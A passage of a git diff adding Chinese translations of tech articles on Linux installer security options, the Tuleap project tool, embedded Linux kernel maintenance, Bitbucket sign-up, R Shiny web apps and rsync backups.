+[20]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/10.png +[21]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/11.png +[22]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/12.png diff --git a/translated/tech/20170118 Why Linux Installers Need to Add Security Features.md b/translated/tech/20170118 Why Linux Installers Need to Add Security Features.md new file mode 100644 index 0000000000..2771c56e9f --- /dev/null +++ b/translated/tech/20170118 Why Linux Installers Need to Add Security Features.md @@ -0,0 +1,71 @@ +为何 Linux 安装者需要添加安全功能 +============================================================ + +> _由于安全问题越来越严重,Linux 发行版需要在安装程序中突出显示基本安全选项,而不是用户稍后可以手动添加的选项。_ + +十二年前,Linux 发行版努力使安装变得简单。在 Ubuntu 和 Fedora 的领导下,它们很早就实现了这一目标。现在,随着对安全性越来越关注,它们需要稍微转变下方向,并在安装程序中突出显示基本安全选项,而不是用户稍后可以手动添加的选项。 + +当然,在最好的情况下,说服用户来设置安全功能都是困难的。太多用户不愿意添加如非特权用户帐户或密码一样简单的功能,他们显然更喜欢用重装或者以每小时 80 美元的价格咨询专家来减少风险。 + +然而,如果一般用户不会注意安全,那他可能会在安装过程中注意。他们可能永远不会再想到它,但也许在安装过程中,当他们的注意力集中时,特别是如果有可见的解释,他们可能被说服选择一个复选框。 + +这种转变也并不伟大。许多安装程序已经提供了自动登录的选择 - 一个不包含个人数据的安装功能或许是可以接受的,但很可能不会被那些觉得登录不方便的用户使用。同样感谢 Ubuntu,它选择加密文件系统 - 至少在主目录中是这样 - 它已经成为许多安装程序的标准。我真正建议的是这样的。 + +此外,外部安装程序如 Firefox 已经无缝合并了隐私浏览,[Signal Private Messenger][8] 是一个替代标准 Android 手机和联系人应用程序。 + +这些建议远不是激进的。它只需要意志和想象力来实现它。 + +### Linux 安全第一步 + +应该将什么类型的安全功能添加到安装程序? + +首先是防火墙。有许多图形界面程序可以设置设置防火墙。尽管十七年的经验,但是为了解释 Byron 谈论 Coleridge 的形而上学的猜测,我有时希望有人解释他们的解释。 + +尽管有良好的意图,大多数防火墙工具让处理 iptables 似乎很直接。[Bastille Linux][9],一个现在已经停止维护加固系统,可以用于安装一个基本的防火墙,我看不出为什么其他发行版不能做同样的事情。 + +一些工具在安装后就可以使用,并且对安装者而言可以没有困难地添加。例如,[Grub 2][10],大多数发行版使用的引导管理器包含了基本密码保护。但不可否认的是,密码仍可以通过 Live CD 绕过,但它仍然在日常情况下提供一定程度的保护,包括远程登录。 + +类似地,一个后安装的密码管理器(如 [pwgen][11])可以添加到安装程序的设置帐户部分。这些工具强制可接受密码的长度,以及它们的大小写字母,数字和特殊字符的组合。它们许多都可以为你生成密码,有些甚至可以记住密码。 + +还有些工具可以在安装中添加。例如,安装程序可以请求定期备份的计划,并添加一个 cronjob 和一个简单的备份工具,如[kbackup][12]。 + +那么加密电子邮件怎么办?如今最流行的邮件阅读器包括了加密邮件的能力,但是设置和使用加密需要用户采取额外的设置,这使常见的任务复杂化,以至于用户会忽略它。然而,看看 Signal 在手机上的加密有多么简单,很显然,在笔记本电脑和工作站上加密会更容易。这大多数发行版可能都喜欢对等加密,而不喜欢 Signal 那样的集中式服务器,但像 [Ring][13] 这样的程序可以提供这种功能。 + +无论在安装程序中添加了什么功能,也许预防措施也可以扩展到生产力软件,如 LibreOffice。大多数安全工作都集中在电子邮件、网络浏览和聊天中,但文字处理程序和电子表格,以及他们的宏语言,是一个明显的恶意软件感染的来源和隐私关注。除了像 [Qubes OS][14]或 [Subgraph][15] 这样的几个意外之外,很少有人努力将生产力软件纳入其安全预防措施 - 这可能会留下一个空白的安全漏洞。 + +### 适应现代 + +当然,在意安全的用户也许会采取一些安全的方法。然而,这样的用户可以是信任自己。 + +我关心的是那些不太了解或不太愿意自己做修补的用户。我们越来越需要易于使用的安全性,并且亟待解决。 + +这些例子只是开始。它们中的大多数已经存在,并且需要以这样的方式来实现它们,使得用户不能忽略它们,并且能够以最少的知识来使用它们。可能实现所有这些只需要一个程序员,包括原型、UI 设计和测试,且不用超过一个月。 + +然而,直到添加这些功能后,大多数主流的 Linux 发行版几乎不能说是对安全性关注。毕竟,如果用户从不使用它们,那怎么会是好工具? + +-------------------------------------------------------------------------------- + +via: http://www.datamation.com/security/why-linux-installers-need-to-add-security-features.html + +作者:[Bruce Byfield][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.datamation.com/author/Bruce-Byfield-6030.html +[1]:http://www.datamation.com/feedback/http://www.datamation.com/security/why-linux-installers-need-to-add-security-features.html +[2]:http://www.datamation.com/author/Bruce-Byfield-6030.html +[3]:http://www.datamation.com/e-mail/http://www.datamation.com/security/why-linux-installers-need-to-add-security-features.html +[4]:http://www.datamation.com/print/http://www.datamation.com/security/why-linux-installers-need-to-add-security-features.html +[5]:http://www.datamation.com/security/why-linux-installers-need-to-add-security-features.html#comment_form +[6]:http://www.datamation.com/security/why-linux-installers-need-to-add-security-features.html# +[7]:http://www.datamation.com/author/Bruce-Byfield-6030.html +[8]:https://whispersystems.org/ +[9]:http://bastille-linux.sourceforge.net/ +[10]:https://help.ubuntu.com/community/Grub2/Passwords +[11]:http://pwgen-win.sourceforge.net/downloads.html +[12]:http://kbackup.sourceforge.net/ +[13]:https://savannah.gnu.org/projects/ring/ +[14]:https://www.qubes-os.org/ +[15]:https://subgraph.com/sgos/ diff --git a/translated/tech/20170119 Get to know Tuleap for project management.md b/translated/tech/20170119 Get to know Tuleap for project management.md index d0dd61cbef..7045120b6d 100644 --- a/translated/tech/20170119 Get to know Tuleap for project management.md +++ b/translated/tech/20170119 Get to know Tuleap for project management.md @@ -4,27 +4,26 @@ ### Tuleap 正在被 Eclipse 基金会使用,用来取代 Bugzilla ![Get to know Tuleap for project management](https://opensource.com/sites/default/files/styles/image-full-size/public/images/education/rh_003588_01_rd3os.combacktoschoolseriesk12_rh_021x_0.png?itok=kOixOaEU "Get to know Tuleap for project management") -图片提供 :  -opensource.com +图片提供:opensource.com -Tuleap 是一个独特的开源项目管理工具,它现在具有巨大的前进动力,现在,每个月它会有一个主要版本。同时它也被列在[ 2015 年前 5 大开源项目管理工具][1]和[ 2016 年前 11 个项目管理工具][2]中。 +Tuleap 是一个独特的开源项目管理工具,目前发展势头很好,现在,每个月它会出一个大版本。它还被列在[ 2015 年前 5 大开源项目管理工具][1]和[ 2016 年前 11 个项目管理工具][2]中。 -Manuel Vacelet,Enalean 的联合创始人和 CTO,Tuleap 项目背后的公司说:“Tuleap 是一个完整的 GPLv2 平台,用于托管软件项目,它提供了一个中心位置,在这里团队可以找到他们所需的所有工具,成功地追踪他们软件项目的生命周期。他们可以找到项目管理(Scrum、看板、瀑布、混合等等)、源码控制(git 和 svn)和代码审查(pull 请求和 gerrit)、持续集成、问题跟踪、wiki和文档等的支持。” +Manuel Vacelet,Enalean 的联合创始人和 CTO,Tuleap 项目背后的公司说:“Tuleap 是一个完整的 GPLv2 平台,用于托管软件项目,它提供了一个中心位置,在这里团队可以找到他们所需的所有工具,成功地追踪他们软件项目的生命周期。他们可以找到项目管理(Scrum、看板、瀑布、混合等等)、源码控制(git 和 svn)和代码审查(pull 请求和 gerrit)、持续集成、问题跟踪、wiki 和文档等的支持。” 在这次采访中,我会和 Manuel 讨论如何开始使用它,以及如何以开源方式管理 Tuleap。 -**Nitish Tiwari (NT): 为什么Tuleap项目很重要? ** +**Nitish Tiwari (NT): 为什么 Tuleap 项目很重要? ** **Manuel Vacelet(MV):** Tuleap 很重要是因为我们坚信一个成功的(软件)项目必须涉及所有利益相关者:开发人员、项目经理、QA、客户和用户。 -很久以前,我是 SourceForge 的一个实习生(当 SourceForge 还是一个自由开源项目时),它最终会在几年后将成为 Tuleap。 我的第一个贡献是将 PhpWiki 集成到工具中(不要告诉任何人,代码是可怕的)。 +很久以前,我是 SourceForge 的一个实习生(当 SourceForge 还是一个自由开源项目时),它最终会在几年后将成为 Tuleap。 我的第一个贡献是将 PhpWiki 集成到该工具中(不要告诉任何人,代码写的很糟)。 -现在,我很高兴作为首席技术官和产品负责人在 Enalean 工作,该公司是 Tuleap 项目的主公司。 +现在,我很高兴作为首席技术官和产品负责人在 Enalean 工作,该公司是 Tuleap 项目的主要贡献公司。 **NT: 给我们说下技术方面。** -**MV:** Tuleap 核心系统是基于 LAMP 并且依赖于 CentOS。如今的开发栈是AngularJS (v1)、REST 后端(PHP)、基于 NodeJS 的推送服务器。但如果你想成为一名 Tuleap 全栈开发人员,你还将需要接触 bash、Perl、Python、Docker、Make。 +**MV:** Tuleap 核心系统是基于 LAMP 并且依赖于 CentOS。如今的开发栈是 AngularJS (v1)、REST 后端(PHP)、基于 NodeJS 的实时推送服务器。但如果你想成为一名 Tuleap 全栈开发人员,你还将需要接触 bash、Perl、Python、Docker、Make。 说到技术方面,需要重点强调的 Tuleap 的一个显著特征是它的可扩展性。Tuleap 在单实例、单服务器上并且没有复杂的 IT,可以处理超过 10,000 人。 @@ -32,25 +31,26 @@ Manuel Vacelet,Enalean 的联合创始人和 CTO,Tuleap 项目背后的公 **MV:** 用户非常多样化。从小型初创公司使用 Tuleap 跟踪他们的项目进度并管理他们的源代码到非常大的公司,如法国电信运营商 Orange,它部署了超过 17,000 用户和 5000 个项目。 -许多用户依靠 Tuleap 来促进敏捷项目并跟踪其进度。开发人员和客户共享同一个工作区。客户不需要学习如何使用 GitHub,也不需要开发人员在“客户访问”平台上进行额外的工作转换。 +许多用户依靠 Tuleap 来促进敏捷项目并跟踪其进度。开发人员和客户共享同一个工作区。客户不需要学习如何使用 GitHub,也不需要开发人员做额外的工作,将其工作转换到“客户可访问”平台。 今年,Tuleap 被[ Eclipse 基金会][3]使用,取代了Bugzilla。 印度电子信息技术部使用 Tuleap 创建了印度政府开放电子政务的开放式协作开发平台。 -Tuleap 有多种不同的使用方式和配置。有些人使用它作为 Drupal 的后端; 它们通过 REST API 插入到 Tuleap 中以管理 bug 和服务请求。 +Tuleap 有多种不同的使用方式和配置。有些人使用它作为 Drupal 客户门户网站的后端; 它们通过 REST API 插入到 Tuleap 中以管理 bug 和服务请求。 甚至一些建筑师也使用它来管理他们的工作进度和 AutoCAD 文件。 -**NT:Tuleap 有做一些使社区成为一个安全和多样的地方的事么?** +**NT:Tuleap 是否做了一些特别的事,使社区更安全,更多样化?** -**MV:** 我们还没有创建“行为准则”; 社区非常平和以及受欢迎,但我们有计划这样做。Tuleap 的开发人员和贡献者来自不同的国家(即加拿大、突尼斯、法国)。35% 的活跃开发者和贡献者是女性。 +**MV:** 我们还没有创建“行为准则”; 本社区非常平和以及受欢迎,但我们有计划这样做。Tuleap 的开发人员和贡献者来自不同的国家(例如加拿大、突尼斯、法国)。而且 35% 的活跃开发者和贡献者是女性。 **NT:由社区建议的 Tuleap 功能的百分比是多少?** **MV:** 几乎 100% 的功能是由社区驱动的。 -这是 Enalean 的关键挑战之一:找到一种商业模式,它允许我们能以正确的方式做开源软件。对我们来说,“开放核心”模型(其中应用程序的核心是开放的,但有趣和有用的部分是封闭源的)不是正确的方法,因为你依赖的部分活在某天闭源。因此,我们发明了[OpenRoadmap][4],这是我们从社区和最终用户那里收集需求并找到公司支付的一种方式。 +这是 Enalean 的关键挑战之一:找到一种商业模式,使我们能以正确的方式做开源软件。对我们来说,“开放核心”模式(其中应用程序的核心是开放的,但有趣和有用的部分是封闭源的)不是正确的方法,因为你最终还是要依赖闭源。因此,我们发明了[OpenRoadmap][4],这种方式是我们从社区和最终用户那里收集需求,并找公司来支付。 + -------------------------------------------------------------------------------- @@ -58,7 +58,7 @@ Tuleap 有多种不同的使用方式和配置。有些人使用它作为 Drupal ![](https://opensource.com/sites/default/files/styles/profile_pictures/public/nitish-crop.png?itok=h4PaLDQq) -Nitish 是一名专业的软件开发人员并对开源有热情。作为基于 Linux 的杂志的技术作者,他会尝试新的开源工具。他喜欢阅读和探索任何开源。在他的空闲时间,他喜欢读励志书。他目前正在构建 DevUp - 一个让开发人员以真正的方式连接所有工具和拥抱DevOps的平台。你可以在 Twitter 上关注他 +Nitish 是一名专业的软件开发人员并对开源有热情。作为基于 Linux 的杂志的技术作者,他会尝试新的开源工具。他喜欢阅读和探索任何开源。在他的空闲时间,他喜欢读励志书。他目前正在构建 DevUp - 一个让开发人员以真正的方式连接所有工具和拥抱 DevOps 的平台。你可以在 Twitter 上关注他 @tiwari_nitish。 -------------------------------------------------------------------------------- @@ -66,7 +66,7 @@ via: https://opensource.com/article/17/1/interview-Tuleap-project 作者:[Nitish Tiwari][a] 译者:[geekpi](https://github.com/geeki) -校对:[校对者ID](https://github.com/校对者ID) +校对:[jamsinepeng](https://github.com/jasminepeng) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 diff --git a/translated/tech/20170119 Long-term Embedded Linux Maintenance Made Easier.md b/translated/tech/20170119 Long-term Embedded Linux Maintenance Made Easier.md new file mode 100644 index 0000000000..d66f89a454 --- /dev/null +++ b/translated/tech/20170119 Long-term Embedded Linux Maintenance Made Easier.md @@ -0,0 +1,53 @@ +长期维护嵌入式 Linux 内核变得容易 +============================================================ + + ![Jan Lübbe ](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/jan-lubbe-elc.png?itok=6G5lADKu "Jan Lübbe ") +Pengutronix 内核黑客 JanLübbe 总结了嵌入式 Linux 中正在增长的安全威胁,并在这次在欧洲举行的嵌入式 Linux 会议上概述了一个计划,以保持长期设备的安全和完整功能。[Linux 基金会][1] + +过去安全漏洞只发生在在民间快速衰落的 Windows 上。恶意软件黑客和拒绝服务专家越来越多地针对过时的嵌入式 Linux 设备,因此 10 月在[欧洲举行的嵌入式 Linux 会议][3](ELCE)上的几个演讲的主题是关于修复 Linux 安全漏洞。 + +最好的参加者之一是“长期维护、管理嵌入式系统10年以上“的 [Pengutronix][4]内核黑客 JanLübbe。在总结嵌入式 Linux 中不断增长的安全威胁后,Lübbe 制定了一项计划,以确保长期设备的安全和完整的功能。 Lübbe说:“我们需要迁移到更新、更稳定的内核,并进行持续维护以修复关键漏洞。我们需要做上游和自动化流程,并建立一个可持续的工作流程。我们没有任何借口在系统中使用过时的软件。” + +随着 Linux 设备变得越来越老,传统的生命周期程序已经不再适用。 Lübbe说:“通常,你会从 SoC 供应商或主线上获取内核、构建系统,并添加到用户空间。你自定义并添加了一个程序,并在做了一些检测后就完成了。但是,在 15 年的维护阶段,你最好希望没有平台变化,或者想添加新的功能,或者需要应用监管变化。” + +所有这些变化越来越多地暴露新的系统错误,并需要大量更新以与上游软件保持同步。 Lübbe说:“但这并不总是在内核中发生导致问题的无意错误”。去年在 Allwinner 内核中发现的[后门][5]后,它补充说:“这些供应商内核从来不会执行主线社区的审查流程”。 + +Lübbe继续说:“你不能相信你的供应商会做正确的事情。也许只有一两个工程师看到这个后门代码。如果补丁发布在 Linux 内核邮件列表上,这将永远不会发生。因为会有人注意到。硬件供应商不关心安全或维护。也许你会在一两年后得到更新,但是即使这样,他们在一个固定版本开始开发到他们声明稳定的点通常需要几年的时间。如果你开始在这个基础上开发,你可能又增加了半年,甚至更过时了。 + +越来越多的嵌入式开发人员在长期稳定(LTS)内核上构建长期产品。但这并不意味着你的工作已经完成。Lübbe说:“一个产品发布后,人们不再经常遵循稳定的发行链,因此他们不应用安全补丁。你会得到两个世界中最糟糕的:一个过时的内核以及没有安全。你不会得到许多人测试的好处。” + +Lübbe 指出,使用像 Red Hat 这样的面向服务器的发行版的 Pengutronix 客户经常遇到问题,因为可以如没有值守人员那样快速的定制、部署、升级系统。 + +“更新可以用于某些东西上,特别是如果它们是 x86,但每个项目基本上是自己建立基础设施更新到新版本。” + +许多开发人员选择向后移植作为更新长期产品的解决方案。Lübbe 说:“开始时很容易,但是一旦你不在项目的维护窗口,他们不会告诉你你使用的版本是否受到一个错误的影响,所以很难找出一个修复是否相关。所以你堆积补丁、修改以及 bug 积累,这些你必须自己维护,因为没有人会使用这些补丁。使用开源软件的好处就丢失了。” + +### 跟随上游项目 + +Lübbe 认为最好的解决方案是跟踪由上游项目维护的版本。“我们主要关注基于主线的开发,所以我们在产品和主流内核及其他上游项目之间尽可能没有差别。长期系统在主线上得到很好的支持。大多数不使用 3D 图形的系统可以运行很少的补丁。较新的内核版本还有很多[新的强化功能][6],这些可以减少漏洞的影响。 + +跟随主线似乎对许多开发人员来说是令人畏惧的,但是如果从一开始就这样,然后坚持下去,就会相对容易一些,Lübbe说:“你需要为系统制定一切开发过程。你总是需要知道什么软件正在运行,这在使用良好的构建系统时会更容易。每个软件版本应定义完整的系统,以便你可以更新系统中的一切。如果你不知道那里有什么,那么你就不能解决它。你还会想要进行自动测试和自动部署更新。 + +为了“保存更新周期”,Lübbe 建议在开始开发时使用最新的 Linux 内核,并且在进入测试时才移动到稳定的内核。之后,他建议每年将系统中的所有软件(包括内核、构建系统、用户空间、glibc 和组件(如 OpenSSL))更新为上一年度其他上游项目支持的版本。 + +Lübbe说:“你在这点更新并不意味着你需要部署。如果你没有看到安全漏洞,你可以把补丁放在一版,如果你需要它就准备好了。 + +最后,Lübbe 建议每个月查看发布公告,并且每周检查 CVE 和主线列表上的安全公告。你只需要回应 “公告实际影响了你”。他补充说:“如果你的内核足够现代,这并没有太多的工作。你不想在新闻中看到你的设备而获得有关你产品的反馈。” + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/news/event/ELCE/2017/long-term-embedded-linux-maintenance-made-easier + +作者:[ERIC BROWN][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/ericstephenbrown +[1]:https://www.linux.com/licenses/category/linux-foundation +[2]:https://www.linux.com/files/images/jan-lubbe-elcpng +[3]:http://events.linuxfoundation.org/events/archive/2016/embedded-linux-conference-europe +[4]:http://www.pengutronix.de/index_en.html +[5]:http://arstechnica.com/security/2016/05/chinese-arm-vendor-left-developer-backdoor-in-kernel-for-android-pi-devices/ +[6]:https://www.linux.com/news/event/ELCE/2017hardening-kernel-protect-against-attackers diff --git a/translated/tech/20170120 Getting Started with Bitbucket for Version Control.md b/translated/tech/20170120 Getting Started with Bitbucket for Version Control.md new file mode 100644 index 0000000000..20a8bda679 --- /dev/null +++ b/translated/tech/20170120 Getting Started with Bitbucket for Version Control.md @@ -0,0 +1,125 @@ +使用 Bitbucket 开始版本控制 +============================================================ + + ![](https://www.blogmint.com/frontendUtil/openPage?page=blog-post-read&oId=c41aba944ad4408095c09ccabc1921ec&uId=1a715d24df2f49c0be2acf7d7409ffbb&count=1&image=one-pixel.png) + +在互联网成为一个巨大的、世界性的现象之前,开发团队曾经被限制在一个小的物理空间内。如果一家公司没有资金支持这样一个冒险,那么与世界另一方的人合作是一个非常昂贵或几乎不可能的梦想。 + +幸运的是,情况不再是这样了。互联网诞生了基于网络的解决方案,允许公司组成的合作团体,包括彼此相距数千英里的人。 + +自从 2008 年首次推出以来,[Bitbucket][1]已成为使用 Mercurial 或 Git 版本控制系统(VCS)的开发人员团队中越来越受欢迎的选择。 + +它提供两个免费帐户与无限数量的私人存储库(每个最多5个用户)和多个付费计划,允许每个帐户有更多用户。此外,标记为 public 的仓库对可以编辑或读取其内容的人数没有限制。 + +### 注册 Bitbucket + +要使用 Bitbucket,你需要设置一个免费帐户。要这样做,请进入 [https://bitbucket.org/][2],然后单击开始免费按钮。 + +首先,你需要输入有效的电子邮件地址,然后点击继续。 你的电子邮件帐户将被验证,如果一切正常,你将被提示输入所需的密码。完成后,再次点击“继续”,并检查你的电子邮件收件箱以确认你的帐户是否已创建: + +[ + ![Bitbucket Singup](http://www.tecmint.com/wp-content/uploads/2017/01/Bitbucket-Singup.png) +][3] + +Bitbucket 注册 + +验证电子邮件地址后,系统会要求你选择用户名。 然后将创建你的帐户,你将会进入 Bitbucket 面板,在那里开始创建团队、项目和仓库: + +[ + ![Bitbucket Dashboard](http://www.tecmint.com/wp-content/uploads/2017/01/Bitbucket-Dashboard.png) +][4] + +Bitbucket 面板 + +如你所见,你可以在几分钟内注册 Bitbucket。Atlassianhave 的人简化了这个过程,以便你可以把你的时间真正用在 Bitbucket 上- 我们接下来会解释这个。 + +### 使用使用 Bitbucket + +让我们检查下在注册完 Bitbucket 之后必须要做的事情。下面是最需做的清单: + +[ + ![Explore Bitbucket Features](http://www.tecmint.com/wp-content/uploads/2017/01/Explore-Bitbucket-Features.png) +][5] + +探索 Bitbucket 功能 + +###### 1). 创建一个团队通过允许多个 Bitbucket 用户共享一个账号计划的方式鼓励协作。 + +这将允许他们轻松地管理团队拥有的仓库。要创建团队,请输入所需的名称,并确保团队标识不存在。接下来,输入你要添加到群组的人员的电子邮件地址,并指明是否要将其设为管理员。最后,单击创建: + +[ + ![Bitbucket - Create a Team](http://www.tecmint.com/wp-content/uploads/2017/01/Bitbucket-Create-a-Team.png) +][6] + +Bitbucket – 创建一个团队 + +###### 2) 创建或导入一个仓库 + +如果你已经使用基于 Git 的解决方案,你可以轻松地将你的仓库导入 Bitbucket。否则,你可以从头创建一个。让我们看看在每种情况下你需要做什么。 + +要创建新的仓库,请单击“仓库”菜单中的“创建仓库”选项。为新仓库和要分组到的项目选择一个名称。接下来,指明是否要将其设置为 private 以及类型(Git 或 Mercurial)。最后,单击创建仓库: + +[ + ![Bitbucket - Create a New Repository](http://www.tecmint.com/wp-content/uploads/2017/01/Bitbucket-Create-a-New-Repository.png) +][7] + +Bitbucket – 创建一个新仓库 + +要导入现有仓库,请从仓库下拉菜单中选择导入仓库。要开始导入,请指定源,输入 URL 和所需的登录凭据(如果需要)。 + +最后,选择新的仓库设置,然后单击导入仓库。忽略有关在指定的 URL 处找不到的仓库的警告,因为它是虚拟的,仅用于演示目的: + +[ + ![Bitbucket - Import Existing Code](http://www.tecmint.com/wp-content/uploads/2017/01/Bitbucket-Import-Existing-Code.png) +][8] + +Bitbucket – 导入存在的代码 + +就是这样,很简单吧。 + +### 在 Bitbucket 中使用仓库工作 + +在你创建一个新仓库或者导入一个仓库时,它会在你的列表上展示出来。这时你就能执行一些常规操作比如克隆、创建分支、pull request、提交修改、添加 README 文件等等: + +[ + ![Bitbucket - Repository Overview](http://www.tecmint.com/wp-content/uploads/2017/01/Bitbucket-Repository-Overview.png) +][9] + +Bitbucket – 仓库概述 + +如果你想了解如何用仓库工作,或者你觉得你想要提升你的 git 技能,你可以参考[ Bitbucket 离线文档][10]。 + +##### 总结 + +如你所见,不管你是版本管理的新手或者老手,Bitbucket 让它变得简单。如果你对本文有任何疑问或评论,请不要犹豫让我们知道。我们期待听到你的声音! + +-------------------------------------------------------------------------------- + +作者简介: + +![](http://1.gravatar.com/avatar/7badddbc53297b2e8ed7011cf45df0c0?s=256&d=blank&r=g) + +我是 Ravi Saive,TecMint 的创建者。一个喜爱在互联网上分享技巧和提示的计算机 geek 和 Linux 老手。我的大多数服务运行在 Linux 开源平台上。请在 Twitter、Facebook、Google+ 上关注我。 + +-------------------------------------------------------------------------------- + + +via: http://www.tecmint.com/bitbucket-for-version-control/ + +作者:[Ravi Saive][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/admin/ +[1]:http://bit.ly/2ieExnS +[2]:http://bit.ly/2ioJISt +[3]:http://www.tecmint.com/wp-content/uploads/2017/01/Bitbucket-Singup.png +[4]:http://www.tecmint.com/wp-content/uploads/2017/01/Bitbucket-Dashboard.png +[5]:http://www.tecmint.com/wp-content/uploads/2017/01/Explore-Bitbucket-Features.png +[6]:http://www.tecmint.com/wp-content/uploads/2017/01/Bitbucket-Create-a-Team.png +[7]:http://www.tecmint.com/wp-content/uploads/2017/01/Bitbucket-Create-a-New-Repository.png +[8]:http://www.tecmint.com/wp-content/uploads/2017/01/Bitbucket-Import-Existing-Code.png +[9]:http://www.tecmint.com/wp-content/uploads/2017/01/Bitbucket-Repository-Overview.png +[10]:https://confluence.atlassian.com/bitbucket/bitbucket-cloud-documentation-home-221448814.html diff --git a/translated/tech/20170120 How to write web apps in R with Shiny.md b/translated/tech/20170120 How to write web apps in R with Shiny.md new file mode 100644 index 0000000000..e89a885718 --- /dev/null +++ b/translated/tech/20170120 How to write web apps in R with Shiny.md @@ -0,0 +1,68 @@ +如何用 R 语言的 Shiny 库编写 web 程序 +============================================================ + ![How to write web apps in R with Shiny](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/BUSINESS_lightbulbs.png?itok=70w-2-Ta "How to write web apps in R with Shiny") +图片提供:  + +opensource.com + +新年快乐!我这个月在写一些更加长的文章,所以你可以在未来几个星期内寻找它们。对于这个月的 Nooks 和 Crannies,我想简要地提一个我一直在自己在玩的一个很棒的 R 库。 + +我的一个亲密朋友最近在用 R 编写东西。我一直都对它很感兴趣,一直在试图挤一点时间,至少学习更多关于 R 以及你可以做的事情的种类。探索 R 的数字处理能力对我而言是一个持续斗争,因为我并不是如我朋友那样有一个数学头脑。这对我来说很慢,但我一直试图将它与我在其他领域的经验联系起来,我甚至开始考虑非常简单的 web 程序。 + +[Shiny][1]是一个来自 RStudio 的工具包,它让创建 web 程序变得更容易。它能从 R 控制台轻松安装,只需要一行,最新的稳定版本将加载供你使用。这里有一个很棒的[教程][2],它会通过设置应用程序的概念、通过前面的课程构建技能的方式引导你。 Shiny 的授权是 GPLv3,源代码可以在 [GitHub][3] 上获得。 + +这是一个用 Shiny 写的简单的小 web 程序: + +``` + +library(shiny) + +server <- function(input, output, session) { + observe({ + myText <- paste("Value above is: ", input$textIn) + updateTextInput(session, "textOut", value=myText) + }) +} + +ui <- basicPage( + h3("My very own sample application!"), + textInput("textIn", "Input goes here, please."), + textInput("textOut", "Results will be printed in this box") +) + +shinyApp(ui = ui, server = server) +``` + +当你在输入框中输入时文字时,它会复制提示语句后面的文字。这并没有什么奇特的,但它向你展示了一个 Shiny 程序的基本结构。“服务端”部分允许你处理所有后端工作,如计算、数据库检索或程序需要发生的任何其他操作。“UI”部分定义了接口,它可以根据需要变得简单或复杂。 + +Shiny 中包含的大量样式和主题使用的是 [Bootstrap][4],所以你可以在学习了一点后,就能用 R 创建广泛的、功能丰富的 web 程序。附加包可以扩展功能,甚至更高级的 JavaScript 程序、模板等。 + +你可以以几种方式处理 Shiny 的后端工作。如果你只是在本地运行你的程序,加载库会就能做到。对于想要发布到网络上的程序,你可以在[ RStudio 的 Shiny 网站][5]上共享它们,运行开源版本的 Shiny 服务器,或通过年度订阅服务从 RStudio 处购买 Shiny Server Pro。 + +经验丰富的 R 大牛可能已经知道 Shiny 了;它已经存在大约几年了。对于像我这样从一个完全不同的编程语言来的人并希望学习一点 R 的人来说,我发现它是相当有帮助的。 + +-------------------------------------------------------------------------------- + + +作者简介: + +![](https://opensource.com/sites/default/files/styles/profile_pictures/public/ruth1_avi.jpg?itok=I_EE7NmY) + +D Ruth Bavousett - D Ruth Bavousett 已经成为一名系统管理员和软件开发人员很长时间了,他的专业生涯开始于 VAX 11/780。在她的职业生涯(迄今为止)中,她花费了大量的时间在满足库的需求上,她自 2008 年以来一直是 Koha 开源库自动化套件的贡献者. Ruth 目前是休斯敦 cPanel 的 Perl 开发人员, 的两只猫的工作人员。 + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/1/writing-new-web-apps-shiny + +作者:[D Ruth Bavousett][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/druthb +[1]:http://shiny.rstudio.com/ +[2]:http://shiny.rstudio.com/tutorial +[3]:https://github.com/studio/shiny +[4]:http://getbootstrap.com/ +[5]:http://shinyapps.io/ diff --git a/translated/tech/20170126 Using rsync to back up your Linux system.md b/translated/tech/20170126 Using rsync to back up your Linux system.md new file mode 100644 index 0000000000..8a527a8726 --- /dev/null +++ b/translated/tech/20170126 Using rsync to back up your Linux system.md @@ -0,0 +1,118 @@ + +使用 rsync 来备份 Linux 系统 +============================================================ + +### 探索 rsync 在备份方案中的作用. + + ![Using rsync to back up your Linux system](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/hard_drives.png?itok=yZWyaSO6 "Using rsync to back up your Linux system") +Image credits : [WIlliam][2][ Warby][3]. Modified by [Jason Baker][4]. Creative Commons [BY-SA 2.0][5]. + +在系统管理员的工作中备份无疑是一个重要的部分。当没有备份完整或者良好地策划实施备份,就可能不可挽回地丢失重要的数据。 + +所有公司都经营着数据。考虑到丢失业务数据造成的经济和业务损失。从小企业到跨国公司的业务都不可能在丢失大部分数据以后幸存。你的办公室可以通过保险赔偿重建,但是你的数据就不可能再恢复了。 + +这里提到的丢失是指数据的完全损坏。而不是指数据被偷走,那是另一种灾难。 + +即使你只是个人用户,备份你自己的数据也是非常重要的,我有二十年来的个人财务数据和现在已经关闭的业务的数据,以及大量的电子发票。也包括近年来我创作的大量不同类型的文档,报告和数据报表。我不想失去任何这些数据。 + +所以备份是我数据长期安全的必要保障。 + +### 备份软件选择 + +有许多软件可以执行备份。大多数linux发行版提供至少一种开源的备份软件。同时也有许多商业备份软件,但是这些都不符合我的需求,所以我决定使用基础linux工具来进行备份。 + +在我为 Open Source Yearbook 写的文章, 